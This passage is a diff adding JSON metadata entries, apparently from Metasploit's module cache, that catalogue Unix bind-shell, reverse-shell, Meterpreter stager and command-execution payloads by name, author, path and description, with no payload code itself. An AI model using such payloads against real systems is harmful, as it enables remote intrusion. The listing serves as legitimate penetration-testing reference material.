1, + "staged": false + }, + "payload_cmd/unix/bind_netcat_gaping_ipv6": { + "name": "Unix Command Shell, Bind TCP (via netcat -e) IPv6", + "fullname": "payload/cmd/unix/bind_netcat_gaping_ipv6", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "hdm " + ], + "description": "Listen for a connection and spawn a command shell via netcat", + "references": [], + "platform": "Unix", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/cmd/unix/bind_netcat_gaping_ipv6.rb", + "is_install_path": true, + "ref_name": "cmd/unix/bind_netcat_gaping_ipv6", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_cmd/unix/bind_nodejs": { + "name": "Unix Command Shell, Bind TCP (via nodejs)", + "fullname": "payload/cmd/unix/bind_nodejs", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "joev " + ], + "description": "Continually listen for a connection and spawn a command shell via nodejs", + "references": [], + "platform": "Unix", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/cmd/unix/bind_nodejs.rb", + "is_install_path": true, + "ref_name": "cmd/unix/bind_nodejs", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_cmd/unix/bind_perl": { + "name": "Unix Command Shell, Bind TCP (via Perl)", + "fullname": "payload/cmd/unix/bind_perl", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Samy ", + 
"cazz " + ], + "description": "Listen for a connection and spawn a command shell via perl", + "references": [], + "platform": "Unix", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/cmd/unix/bind_perl.rb", + "is_install_path": true, + "ref_name": "cmd/unix/bind_perl", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_cmd/unix/bind_perl_ipv6": { + "name": "Unix Command Shell, Bind TCP (via perl) IPv6", + "fullname": "payload/cmd/unix/bind_perl_ipv6", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Samy ", + "cazz " + ], + "description": "Listen for a connection and spawn a command shell via perl", + "references": [], + "platform": "Unix", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/cmd/unix/bind_perl_ipv6.rb", + "is_install_path": true, + "ref_name": "cmd/unix/bind_perl_ipv6", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_cmd/unix/bind_r": { + "name": "Unix Command Shell, Bind TCP (via R)", + "fullname": "payload/cmd/unix/bind_r", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "RageLtMan " + ], + "description": "Continually listen for a connection and spawn a command shell via R", + "references": [], + "platform": "Unix", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": 
"/modules/payloads/singles/cmd/unix/bind_r.rb", + "is_install_path": true, + "ref_name": "cmd/unix/bind_r", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_cmd/unix/bind_ruby": { + "name": "Unix Command Shell, Bind TCP (via Ruby)", + "fullname": "payload/cmd/unix/bind_ruby", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "kris katterjohn " + ], + "description": "Continually listen for a connection and spawn a command shell via Ruby", + "references": [], + "platform": "Unix", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/cmd/unix/bind_ruby.rb", + "is_install_path": true, + "ref_name": "cmd/unix/bind_ruby", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_cmd/unix/bind_ruby_ipv6": { + "name": "Unix Command Shell, Bind TCP (via Ruby) IPv6", + "fullname": "payload/cmd/unix/bind_ruby_ipv6", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "kris katterjohn " + ], + "description": "Continually listen for a connection and spawn a command shell via Ruby", + "references": [], + "platform": "Unix", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/cmd/unix/bind_ruby_ipv6.rb", + "is_install_path": true, + "ref_name": "cmd/unix/bind_ruby_ipv6", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false 
+ }, + "payload_cmd/unix/bind_socat_sctp": { + "name": "Unix Command Shell, Bind SCTP (via socat)", + "fullname": "payload/cmd/unix/bind_socat_sctp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "RageLtMan " + ], + "description": "Creates an interactive shell via socat", + "references": [], + "platform": "Unix", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2023-04-27 16:21:34 +0000", + "path": "/modules/payloads/singles/cmd/unix/bind_socat_sctp.rb", + "is_install_path": true, + "ref_name": "cmd/unix/bind_socat_sctp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_cmd/unix/bind_socat_udp": { + "name": "Unix Command Shell, Bind UDP (via socat)", + "fullname": "payload/cmd/unix/bind_socat_udp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "RageLtMan " + ], + "description": "Creates an interactive shell via socat", + "references": [], + "platform": "Unix", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/cmd/unix/bind_socat_udp.rb", + "is_install_path": true, + "ref_name": "cmd/unix/bind_socat_udp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_cmd/unix/bind_stub": { + "name": "Unix Command Shell, Bind TCP (stub)", + "fullname": "payload/cmd/unix/bind_stub", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "hdm " + ], + "description": "Listen for a connection and spawn a command shell (stub only, no payload)", + 
"references": [], + "platform": "Unix", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/cmd/unix/bind_stub.rb", + "is_install_path": true, + "ref_name": "cmd/unix/bind_stub", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_cmd/unix/bind_zsh": { + "name": "Unix Command Shell, Bind TCP (via Zsh)", + "fullname": "payload/cmd/unix/bind_zsh", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Doug Prostko ", + "Wang Yihang " + ], + "description": "Listen for a connection and spawn a command shell via Zsh. Note: Although Zsh is\n often available, please be aware it isn't usually installed by default.", + "references": [], + "platform": "Unix", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/cmd/unix/bind_zsh.rb", + "is_install_path": true, + "ref_name": "cmd/unix/bind_zsh", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_cmd/unix/generic": { + "name": "Unix Command, Generic Command Execution", + "fullname": "payload/cmd/unix/generic", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "hdm " + ], + "description": "Executes the supplied command", + "references": [], + "platform": "Unix", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/cmd/unix/generic.rb", + 
"is_install_path": true, + "ref_name": "cmd/unix/generic", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_cmd/unix/interact": { + "name": "Unix Command, Interact with Established Connection", + "fullname": "payload/cmd/unix/interact", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "hdm " + ], + "description": "Interacts with a shell on an established socket connection", + "references": [], + "platform": "Unix", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/cmd/unix/interact.rb", + "is_install_path": true, + "ref_name": "cmd/unix/interact", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_cmd/unix/pingback_bind": { + "name": "Unix Command Shell, Pingback Bind TCP (via netcat)", + "fullname": "payload/cmd/unix/pingback_bind", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "asoto-r7" + ], + "description": "Accept a connection, send a UUID, then exit", + "references": [], + "platform": "Unix", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/cmd/unix/pingback_bind.rb", + "is_install_path": true, + "ref_name": "cmd/unix/pingback_bind", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_cmd/unix/pingback_reverse": { + "name": "Unix Command Shell, Pingback Reverse TCP 
(via netcat)", + "fullname": "payload/cmd/unix/pingback_reverse", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "asoto-r7" + ], + "description": "Creates a socket, send a UUID, then exit", + "references": [], + "platform": "Unix", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/cmd/unix/pingback_reverse.rb", + "is_install_path": true, + "ref_name": "cmd/unix/pingback_reverse", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_cmd/unix/python/exec": { + "name": "Python Exec, Python Execute Command", + "fullname": "payload/cmd/unix/python/exec", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre" + ], + "description": "Execute a Python payload from a command.\n\nExecute an arbitrary OS command. 
Compatible with Python 2.7 and 3.4+.", + "references": [], + "platform": "Unix", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-11-04 00:33:03 +0000", + "path": "/modules/payloads/adapters/cmd/unix/python.rb", + "is_install_path": true, + "ref_name": "cmd/unix/python/exec", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/unix/python", + "adapted_refname": "python/exec", + "staged": false + }, + "payload_cmd/unix/python/meterpreter/bind_tcp": { + "name": "Python Exec, Python Meterpreter, Python Bind TCP Stager", + "fullname": "payload/cmd/unix/python/meterpreter/bind_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre" + ], + "description": "Execute a Python payload from a command.\n\nRun a meterpreter server in Python (compatible with 2.5-2.7 & 3.1+).\n\nListen for a connection", + "references": [], + "platform": "Unix", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-11-04 00:33:03 +0000", + "path": "/modules/payloads/adapters/cmd/unix/python.rb", + "is_install_path": true, + "ref_name": "cmd/unix/python/meterpreter/bind_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/unix/python", + "adapted_refname": "python/meterpreter/bind_tcp", + "staged": true, + "stage_refname": "python/meterpreter", + "stager_refname": "python/bind_tcp" + }, + "payload_cmd/unix/python/meterpreter/bind_tcp_uuid": { + "name": "Python Exec, Python Meterpreter, Python Bind TCP Stager with UUID Support", + "fullname": "payload/cmd/unix/python/meterpreter/bind_tcp_uuid", + "aliases": [], 
+ "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "OJ Reeves" + ], + "description": "Execute a Python payload from a command.\n\nRun a meterpreter server in Python (compatible with 2.5-2.7 & 3.1+).\n\nListen for a connection with UUID Support", + "references": [], + "platform": "Unix", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-11-04 00:33:03 +0000", + "path": "/modules/payloads/adapters/cmd/unix/python.rb", + "is_install_path": true, + "ref_name": "cmd/unix/python/meterpreter/bind_tcp_uuid", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/unix/python", + "adapted_refname": "python/meterpreter/bind_tcp_uuid", + "staged": true, + "stage_refname": "python/meterpreter", + "stager_refname": "python/bind_tcp_uuid" + }, + "payload_cmd/unix/python/meterpreter/reverse_http": { + "name": "Python Exec, Python Meterpreter, Python Reverse HTTP Stager", + "fullname": "payload/cmd/unix/python/meterpreter/reverse_http", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre" + ], + "description": "Execute a Python payload from a command.\n\nRun a meterpreter server in Python (compatible with 2.5-2.7 & 3.1+).\n\nTunnel communication over HTTP", + "references": [], + "platform": "Unix", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-11-04 00:33:03 +0000", + "path": "/modules/payloads/adapters/cmd/unix/python.rb", + "is_install_path": true, + "ref_name": "cmd/unix/python/meterpreter/reverse_http", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + 
"adapter_refname": "cmd/unix/python", + "adapted_refname": "python/meterpreter/reverse_http", + "staged": true, + "stage_refname": "python/meterpreter", + "stager_refname": "python/reverse_http" + }, + "payload_cmd/unix/python/meterpreter/reverse_https": { + "name": "Python Exec, Python Meterpreter, Python Reverse HTTPS Stager", + "fullname": "payload/cmd/unix/python/meterpreter/reverse_https", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre" + ], + "description": "Execute a Python payload from a command.\n\nRun a meterpreter server in Python (compatible with 2.5-2.7 & 3.1+).\n\nTunnel communication over HTTP using SSL", + "references": [], + "platform": "Unix", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-11-04 00:33:03 +0000", + "path": "/modules/payloads/adapters/cmd/unix/python.rb", + "is_install_path": true, + "ref_name": "cmd/unix/python/meterpreter/reverse_https", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/unix/python", + "adapted_refname": "python/meterpreter/reverse_https", + "staged": true, + "stage_refname": "python/meterpreter", + "stager_refname": "python/reverse_https" + }, + "payload_cmd/unix/python/meterpreter/reverse_tcp": { + "name": "Python Exec, Python Meterpreter, Python Reverse TCP Stager", + "fullname": "payload/cmd/unix/python/meterpreter/reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre" + ], + "description": "Execute a Python payload from a command.\n\nRun a meterpreter server in Python (compatible with 2.5-2.7 & 3.1+).\n\nConnect back to the attacker", + "references": [], + "platform": "Unix", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + 
"autofilter_services": null, + "targets": null, + "mod_time": "2022-11-04 00:33:03 +0000", + "path": "/modules/payloads/adapters/cmd/unix/python.rb", + "is_install_path": true, + "ref_name": "cmd/unix/python/meterpreter/reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/unix/python", + "adapted_refname": "python/meterpreter/reverse_tcp", + "staged": true, + "stage_refname": "python/meterpreter", + "stager_refname": "python/reverse_tcp" + }, + "payload_cmd/unix/python/meterpreter/reverse_tcp_ssl": { + "name": "Python Exec, Python Meterpreter, Python Reverse TCP SSL Stager", + "fullname": "payload/cmd/unix/python/meterpreter/reverse_tcp_ssl", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "Ben Campbell ", + "RageLtMan" + ], + "description": "Execute a Python payload from a command.\n\nRun a meterpreter server in Python (compatible with 2.5-2.7 & 3.1+).\n\nReverse Python connect back stager using SSL", + "references": [], + "platform": "Unix", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-11-04 00:33:03 +0000", + "path": "/modules/payloads/adapters/cmd/unix/python.rb", + "is_install_path": true, + "ref_name": "cmd/unix/python/meterpreter/reverse_tcp_ssl", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/unix/python", + "adapted_refname": "python/meterpreter/reverse_tcp_ssl", + "staged": true, + "stage_refname": "python/meterpreter", + "stager_refname": "python/reverse_tcp_ssl" + }, + "payload_cmd/unix/python/meterpreter/reverse_tcp_uuid": { + "name": "Python Exec, Python Meterpreter, Python Reverse TCP Stager with UUID Support", + 
"fullname": "payload/cmd/unix/python/meterpreter/reverse_tcp_uuid", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "OJ Reeves" + ], + "description": "Execute a Python payload from a command.\n\nRun a meterpreter server in Python (compatible with 2.5-2.7 & 3.1+).\n\nConnect back to the attacker with UUID Support", + "references": [], + "platform": "Unix", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-11-04 00:33:03 +0000", + "path": "/modules/payloads/adapters/cmd/unix/python.rb", + "is_install_path": true, + "ref_name": "cmd/unix/python/meterpreter/reverse_tcp_uuid", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/unix/python", + "adapted_refname": "python/meterpreter/reverse_tcp_uuid", + "staged": true, + "stage_refname": "python/meterpreter", + "stager_refname": "python/reverse_tcp_uuid" + }, + "payload_cmd/unix/python/meterpreter_bind_tcp": { + "name": "Python Exec, Python Meterpreter Shell, Bind TCP Inline", + "fullname": "payload/cmd/unix/python/meterpreter_bind_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre" + ], + "description": "Execute a Python payload from a command.\n\nConnect to the victim and spawn a Meterpreter shell", + "references": [], + "platform": "Unix", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-11-04 00:33:03 +0000", + "path": "/modules/payloads/adapters/cmd/unix/python.rb", + "is_install_path": true, + "ref_name": "cmd/unix/python/meterpreter_bind_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + 
"payload_type": 8, + "adapter_refname": "cmd/unix/python", + "adapted_refname": "python/meterpreter_bind_tcp", + "staged": false + }, + "payload_cmd/unix/python/meterpreter_reverse_http": { + "name": "Python Exec, Python Meterpreter Shell, Reverse HTTP Inline", + "fullname": "payload/cmd/unix/python/meterpreter_reverse_http", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre" + ], + "description": "Execute a Python payload from a command.\n\nConnect back to the attacker and spawn a Meterpreter shell", + "references": [], + "platform": "Unix", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-11-04 00:33:03 +0000", + "path": "/modules/payloads/adapters/cmd/unix/python.rb", + "is_install_path": true, + "ref_name": "cmd/unix/python/meterpreter_reverse_http", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/unix/python", + "adapted_refname": "python/meterpreter_reverse_http", + "staged": false + }, + "payload_cmd/unix/python/meterpreter_reverse_https": { + "name": "Python Exec, Python Meterpreter Shell, Reverse HTTPS Inline", + "fullname": "payload/cmd/unix/python/meterpreter_reverse_https", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre" + ], + "description": "Execute a Python payload from a command.\n\nConnect back to the attacker and spawn a Meterpreter shell", + "references": [], + "platform": "Unix", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-11-04 00:33:03 +0000", + "path": "/modules/payloads/adapters/cmd/unix/python.rb", + "is_install_path": true, + "ref_name": "cmd/unix/python/meterpreter_reverse_https", + "check": false, + 
"post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/unix/python", + "adapted_refname": "python/meterpreter_reverse_https", + "staged": false + }, + "payload_cmd/unix/python/meterpreter_reverse_tcp": { + "name": "Python Exec, Python Meterpreter Shell, Reverse TCP Inline", + "fullname": "payload/cmd/unix/python/meterpreter_reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre" + ], + "description": "Execute a Python payload from a command.\n\nConnect back to the attacker and spawn a Meterpreter shell", + "references": [], + "platform": "Unix", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-11-04 00:33:03 +0000", + "path": "/modules/payloads/adapters/cmd/unix/python.rb", + "is_install_path": true, + "ref_name": "cmd/unix/python/meterpreter_reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/unix/python", + "adapted_refname": "python/meterpreter_reverse_tcp", + "staged": false + }, + "payload_cmd/unix/python/pingback_bind_tcp": { + "name": "Python Exec, Python Pingback, Bind TCP (via python)", + "fullname": "payload/cmd/unix/python/pingback_bind_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "asoto-r7" + ], + "description": "Execute a Python payload from a command.\n\nListens for a connection from the attacker, sends a UUID, then terminates", + "references": [], + "platform": "Unix", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-11-04 00:33:03 +0000", + "path": 
"/modules/payloads/adapters/cmd/unix/python.rb", + "is_install_path": true, + "ref_name": "cmd/unix/python/pingback_bind_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/unix/python", + "adapted_refname": "python/pingback_bind_tcp", + "staged": false + }, + "payload_cmd/unix/python/pingback_reverse_tcp": { + "name": "Python Exec, Python Pingback, Reverse TCP (via python)", + "fullname": "payload/cmd/unix/python/pingback_reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "asoto-r7" + ], + "description": "Execute a Python payload from a command.\n\nConnects back to the attacker, sends a UUID, then terminates", + "references": [], + "platform": "Unix", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-11-04 00:33:03 +0000", + "path": "/modules/payloads/adapters/cmd/unix/python.rb", + "is_install_path": true, + "ref_name": "cmd/unix/python/pingback_reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/unix/python", + "adapted_refname": "python/pingback_reverse_tcp", + "staged": false + }, + "payload_cmd/unix/python/shell_bind_tcp": { + "name": "Python Exec, Command Shell, Bind TCP (via python)", + "fullname": "payload/cmd/unix/python/shell_bind_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "mumbai" + ], + "description": "Execute a Python payload from a command.\n\nCreates an interactive shell via Python, encodes with base64 by design. 
Compatible with Python 2.4-2.7 and 3.4+.", + "references": [], + "platform": "Unix", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-11-04 00:33:03 +0000", + "path": "/modules/payloads/adapters/cmd/unix/python.rb", + "is_install_path": true, + "ref_name": "cmd/unix/python/shell_bind_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/unix/python", + "adapted_refname": "python/shell_bind_tcp", + "staged": false + }, + "payload_cmd/unix/python/shell_reverse_sctp": { + "name": "Python Exec, Command Shell, Reverse SCTP (via python)", + "fullname": "payload/cmd/unix/python/shell_reverse_sctp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "RageLtMan " + ], + "description": "Execute a Python payload from a command.\n\nCreates an interactive shell via Python, encodes with base64 by design. 
Compatible with Python 2.6-2.7 and 3.4+.", + "references": [], + "platform": "Unix", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-11-04 00:33:03 +0000", + "path": "/modules/payloads/adapters/cmd/unix/python.rb", + "is_install_path": true, + "ref_name": "cmd/unix/python/shell_reverse_sctp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/unix/python", + "adapted_refname": "python/shell_reverse_sctp", + "staged": false + }, + "payload_cmd/unix/python/shell_reverse_tcp": { + "name": "Python Exec, Command Shell, Reverse TCP (via python)", + "fullname": "payload/cmd/unix/python/shell_reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "Ben Campbell " + ], + "description": "Execute a Python payload from a command.\n\nCreates an interactive shell via Python, encodes with base64 by design. 
Compatible with Python 2.4-2.7 and 3.4+.", + "references": [], + "platform": "Unix", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-11-04 00:33:03 +0000", + "path": "/modules/payloads/adapters/cmd/unix/python.rb", + "is_install_path": true, + "ref_name": "cmd/unix/python/shell_reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/unix/python", + "adapted_refname": "python/shell_reverse_tcp", + "staged": false + }, + "payload_cmd/unix/python/shell_reverse_tcp_ssl": { + "name": "Python Exec, Command Shell, Reverse TCP SSL (via python)", + "fullname": "payload/cmd/unix/python/shell_reverse_tcp_ssl", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "RageLtMan " + ], + "description": "Execute a Python payload from a command.\n\nCreates an interactive shell via Python, uses SSL, encodes with base64 by design. 
Compatible with Python 2.6-2.7 and 3.4+.", + "references": [], + "platform": "Unix", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-11-04 00:33:03 +0000", + "path": "/modules/payloads/adapters/cmd/unix/python.rb", + "is_install_path": true, + "ref_name": "cmd/unix/python/shell_reverse_tcp_ssl", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/unix/python", + "adapted_refname": "python/shell_reverse_tcp_ssl", + "staged": false + }, + "payload_cmd/unix/python/shell_reverse_udp": { + "name": "Python Exec, Command Shell, Reverse UDP (via python)", + "fullname": "payload/cmd/unix/python/shell_reverse_udp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "RageLtMan " + ], + "description": "Execute a Python payload from a command.\n\nCreates an interactive shell via Python, encodes with base64 by design. 
